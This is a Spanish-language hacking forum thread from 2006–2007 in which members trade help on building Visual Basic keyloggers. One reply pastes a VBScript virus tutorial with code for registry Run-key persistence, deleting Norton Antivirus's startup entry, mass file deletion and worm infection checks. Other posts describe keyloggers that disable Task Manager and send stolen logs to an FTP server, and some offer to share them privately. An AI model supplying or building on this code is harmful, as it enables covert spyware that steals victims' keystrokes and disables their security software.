hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
06 de Octubre de 2008, 05:34:31
Noticias: Nomina a tus preferidos para los pOrtal Hacker Awards 2008
Para ver este enlace Registrate o Inicia Sesion
aqui

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic (Moderadores: ranefi, crypto136, ziBboh, >> s E t H <<)
| | | |-+  Keylogger
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Keylogger  (Leído 801 veces)
ArkangelX
Recien llegado
*
Desconectado Desconectado

Ver Perfil
« : 18 de Diciembre de 2006, 07:19:07 »

Hola a todos este es mi primer post...jajajj. ..aqui le voy a dejar un keylogger q hice basandome en un manual....nece sito q me ayuden para modificarlo... .lo q necesito es q los datos se guarden en un archivo de texto (.txt) en c: y q al instalarlo se copie en el redegit (run) para q empiese a correr desde el inicio....

Aqui le dejo el link:
http://es.geocities.com/arkangeldeladesolacion/Keylogger.zip

yahoo
Guan
NZ2
**

Bifrost 1.1 user

Ver Perfil WWW
« Respuesta #1 : 18 de Diciembre de 2006, 10:19:27 »

Eso es muy facil, solo hay qe buscar un poquillo, mira aqi te dejo un manual qe hace ambas cosas y qe va rulando por la web ya desde hace tiempo...

===============================================================================

==========================El Objeto Scripting.File SystemObject=========================

Es necesario para poder usar los siguientes comandos en un VBS, el objeto nos sirve para manipular acciones con
archivos y carpetas.

Nota: Podemos realizar acciones con los archivos definiendo una ruta o sin ella, borrar archivo, copiar carpetas etc.

Si pones ".\" el VBS realizara la accion en la carpeta actual
Si pones "C:\" el VBS realizara la accion en la ruta especificada, en este caso es la C

No es necesario definir el objeto cada vez que utilicemos un comando que lo necesite, solo si queremos cambiar
la variable que la utilizaba.

---------------------------------------------------------------------------------------------------------------------
Copiar archivos
---------------------------------------------------------------------------------------------------------------------

CopyFile

Con este comando, podemos copiar archivos en la pc.

Ejemplo:

Set zonavirus = CreateObject("Scripting.File SystemObject")
zonavirus.Copy File ".\ejemplo_Copyfile.vbs","C:\muere_perro.txt"

Copia el archivo "ejemplo_Copyfi le.vbs" como "muere_perro.tx t" en la unidad C, puedes copiar otros archivos
aparte del mismo vbs.

Mover archivos

MoveFile

Con este comando, podemos mover archivos de la pc.

Ejemplo:

zonavirus.Move File ".\ejemplo_MoverArchivo.vbs", "C:\ejemplo_MoverArchivo.vbs"

Esto mueve el archivo "ejemplo_MoverA rchivo.vbs" a C, puedes mover otros archivos aparte del mismo vbs.

Borrar archivos

DeleteFile

Con este comando borramos archivos en la pc.

Ejemplo:

zonavirus.Dele teFile "C:\muere_perro.txt"

Esto borrara el archivo "muere_perro.tx t" de la unidad C. Si pones *.* ¡borraria todos los archivos!, ¡cuidado!

Crear una carpeta

CreateFolder

Sirve para crear carpetas en el pc.

Ejemplo:

zonavirus.Crea teFolder "C:\muere_perro"

Esto creara la carpeta "muere_perro" en la unidad C

Borrar una carpeta

DeleteFolder

Este comando sirve para borrar carpetas.

Ejemplo:

zonavirus.Dele teFolder "C:\muere_perro"

Esto borrara la carpeta "muere_perro" de la unidad C. Si pones *.* borraria todos las carpetas!

Crear un archivo

CreateTextFile

Sirve para crear archivos en la pc.

zonavirus.Crea teTextFile "C:\muere_perro.mp3"

Esto creara el archivo "muere_perro.mp 3" en la unidad C, si el archivo existe este sera remplazado, en el siguiente
segmento veremos la manera de verificar si existe el archivo y evitar sobreescribirl o.

Crea un archivo y escribe dentro de el

Esto es algo mas complicado, no tan facil como lo que hemos visto anteriormente pero es escencial si queremos
dejar archivos con mensajes. Primero definiremos los comandos o palabras claves que se pueden utilizar en este
procedimiento.

Ahora la sintaxis al crear un archivo difiere un poco porque con "True" y "False" podemos verificar si existe un
archivo con el nombre que elegimos y podemos decidir si sobreescribirl o o detener la ejecucion de la rutina de
escritura.

Como queremos crear un archivo y ademas escribir en el, quizas decenas de lineas debemos de manejar dos
variables. Esto es para no estar definiendo una y otra vez el nombre del archivo donde vamos a escribir.

Lo haremos de la siguiente manera, en una variable incluiremos el objeto a utlizar que en este caso es "Scripting.File SystemObject" y en otra variable le asignaremos el valor del comando que se encargara de crear el
archivo

Las variables que utilizare para este ejemplo seran:

zonavirus = para el objeto
virus = para el comando que crea el archivo donde escribiremos

Las lineas del programa que iran de la siguiente manera:

Set virus = zonavirus.Crea teTextFile ("c:\muere_perro.txt", True)

Esto en español quiere decir:

La variable "zonavirus" equivale al objeto "Scripting.File SystemObject"
La variable "virus" equivale a la variable zonavirus que crea el archivo
"muere_perro.tx t" donde escribiremos.

Veamos los comandos que usaremos para escribrir en un archivo.

Comandos al crear el archivo:

True = exista o no exista se escribe en el archivo
False = si el archivo existe no lo sobreescribira

Comandos al escribir en el archivo:

Write = este permite escribir en un solo renglon
WriteLine = sirve para escribir en una linea
WriteBlankLine s = sirve para colocar lineas en blanco en el archivo
Close = cierra el archivo

Ejemplo de la escritura en un archivo con todos los comandos definidos:

Set virus = zonavirus.Crea teTextFile (".\muere_perro.txt", True)
virus.WriteLin e "-------------------------------------"
virus.WriteLin e "Tutorial de VBS"
virus.Write "p"
virus.Write "o"
virus.Write "r"
virus.WriteBla nkLines "1"
virus.WriteLin e "Kuasanagui"
virus.WriteBla nkLines "2"
virus.WriteLin e "¡ENTRA A MI CANAL EN EL MIRC!"
virus.WriteLin e "SERVER: TABASCO.CHATMI RC.COM"
virus.WriteLin e "PORT:6667"
virus.WriteLin e "CANAL:ZONAVIRUS"
virus.WriteLin e "-------------------------------------"
virus.Close

Esto creara el archivo "muere_perro.tx t", "False" hara que si el archivo existe no sea sobreescrito, si no existe,
escribira unas palabras y despues lo cerrara.

=============================El Objeto WScript.Shell=============================

Para poder usar los siguientes comandos en un VBS, hay que definir el objeto que manipula acciones con archivos.

Con este podemos realizar acciones distintas que con el objeto anterior, como ejecutar archivos, abrir el explorador,
escribir en el registro, etc.

Ejecutar y/o abrir archivos o paginas web

Run

Sirve para ejecutar archivos y abrir paginas web.

Ejemplo:

On Error Resume Next
Set zonavirus = CreateObject("WScript.Shell")
zonavirus.Run "C:\muere_perro.txt"

Esto ejecutara el archivo "muere_perro.tx t" si este existe en la ruta actual, Si escibes un URL este seria abierto
por el navegador de internet, pero es necesario que pongas las "www", como
www.geocities. com/zonavirus;
y si
la url no comienza con "www", tienes que anteponer el "http:\\", como http:\\gedzaclabs.host.sk

Crea y/o modificar una entrada de registro de Windows

RegWrite

Con este comando podemos escribir en el registro de Windows

Ejemplo:

zonavirus.RegW rite "HKEY_CLASSES_R OOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
\InfoTip","Tutorial de VBS por Kuasanagui"

Modifica el mensaje que muestra el windows al pasar el mouse en el icono "MI PC" y le pone otro valor, en este
caso le cambia el mensaje que desplegaba, compruebalo ejecutando el vbs de ejemplo y despues pasando el mouse
sobre el icono "MI PC" y veras.

Si quieres que tu VBS sea residente lo que puedes hacer es crear una linea en el registro que servira para que el
VBS se ejecute a cada inicio de Windows, haciendose residente.

Ejemplo:

zonavirus.RegW rite "HKEY_LOCAL_MAC HINE\Software\Microsoft\Windows\CurrentVersion\Run\Kuasanagui",
"C:\ejemplo_residente.vbs"

Esto hara que el archivo "ejemplo_reside nte.vbs" se ejecute cada vez que se inicie Windows, siempre y cuando el
VBS exista en C:

Borrar una entrada de registro de Windows

RegDelete

Borra entradas de registro

Ejemplo:

On Error Resume Next
zonavirus.RegD elete "HKEY_LOCAL_MAC HINE\Software\Microsoft\Windows\CurrentVersion\Run\
NAV Agent"

Borra la entrada de registro declarada, si no existe, omite el error y no hace nada. En este caso, la clave que inicia
a Norton Antivirus 2002, esto hara que no se ejecute el NAV2002.

Lee una entrada de registro de Windows

RegRead

Sirve para verificar los valores de una entrada de registro. Por ejemplo, el VBS puede saber leyendo una entrada
de registro si se encuentra infectado la PC, y si no, proceder con la infecccion.

La entrada de registro a leer debe de estrar dentro de parentesis y comillas... bueno a mi solo me funciona asi. =P

Ejemplo:

On Error Resume Next
X = zonavirus.regR ead ("HKEY_LOCAL_MAC HINE\Software\Microsoft\Windows\CurrentVersion\GEDZAC")
If X = "1" Then
MsgBox "Esta Pc esta infectada con el Worm.P2P.Torre sGemelas"
Else
MsgBox "Esta Pc esta NO infectada con el Worm.P2P.Torre sGemelas"
End If

ala con esto creo k tienes suficiente... xD

ArkangelX
Recien llegado
*

Ver Perfil
« Respuesta #2 : 21 de Diciembre de 2006, 05:56:04 »

muchas gracias voy a leerlo y lo comento despues.....gr aciaaaaaaassss ssssssss!!!

SALU2
ziBboh
Moderador

ziBboh dice: Ya nacio mini-ziBboh! :)

Ver Perfil
« Respuesta #3 : 28 de Diciembre de 2006, 10:02:28 »

Yo tengo un codigo mas o menos bueno de un keyloger, el cual guarda todo en un archivo te texto (Fecha y hora, nombre de la pc, nombre de las ventanas activas, etc), desactiva el administrador de tareas, se coloca en el registro de windows, etc. si gustas enviame un e-mail o agregame al msn y te lo paso Ok.

ziBboh dice: NO SPAM!El número de post no te hace mejor ...Todos somos iguales!
Guan
NZ2
**

Bifrost 1.1 user

Ver Perfil WWW
« Respuesta #4 : 29 de Diciembre de 2006, 03:13:42 »

Yo tengo un codigo mas o menos bueno de un keyloger, el cual guarda todo en un archivo te texto (Fecha y hora, nombre de la pc, nombre de las ventanas activas, etc), desactiva el administrador de tareas, se coloca en el registro de windows, etc. si gustas enviame un e-mail o agregame al msn y te lo paso Ok.

Hombre, ya qe te pones podrias postearlo aqi y asi nos enteramos todos...

ziBboh
Moderador

Ver Perfil
« Respuesta #5 : 29 de Diciembre de 2006, 08:37:30 »

la verdada me da algo de verguenza poner mi codigo de fuente completo en si, ya q es muy pobre mis conocimientos de programacion pero aqui hay una imagen del form en modo visible ok. Salu2.

^Multi-Lenguajes^
Recien llegado
*

<Programador> <Visual Basic> <Batch> <PHP>

Ver Perfil
« Respuesta #6 : 17 de Enero de 2007, 04:44:16 »

Me acabe de crear un buen keylogger. . . pero yo quiero que cuando se inicie el programa envie un mail a mi correo dandome el log.txt o que lo suba a mi FTP. . . o cuando la reinicie (osea termine el programa) espero que me sepan armar ese codigo ! :S:S

ziBboh
Moderador

Ver Perfil
« Respuesta #7 : 24 de Enero de 2007, 03:21:11 »

Saludos ^Multi-LKenguajes^, me interesa colaborar contigo en el tema de KeyLoger, creo que se como darle mejoras, incluyendo las que mencionas sobre enviarlo a un FTP., te agregue a mi msn, si te interesa sino solo no me aceptes como contacto. Saludos, y espero pronto terminar un mejor KeyLoger.

Korpex
Visitante
« Respuesta #8 : 25 de Enero de 2007, 12:59:48 »

http://foro.portalhacker.net/index.php/topic,24092.msg97066.html#msg97066

Keylogger que guarda los logs en un ftp cada dos días. Si os interesa os paso "la siguiente version", que encripta los logs y solo los desencripta creando otro archivo a la hora de subirlo a un FTP, destruyendo ese archivo temporal acto seguido . Posteriormente sigue trabajando con el archivo que tiene todos los logs encriptados.
Para que os lo pase, enviarme un mensaje privado.

Saludos.
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión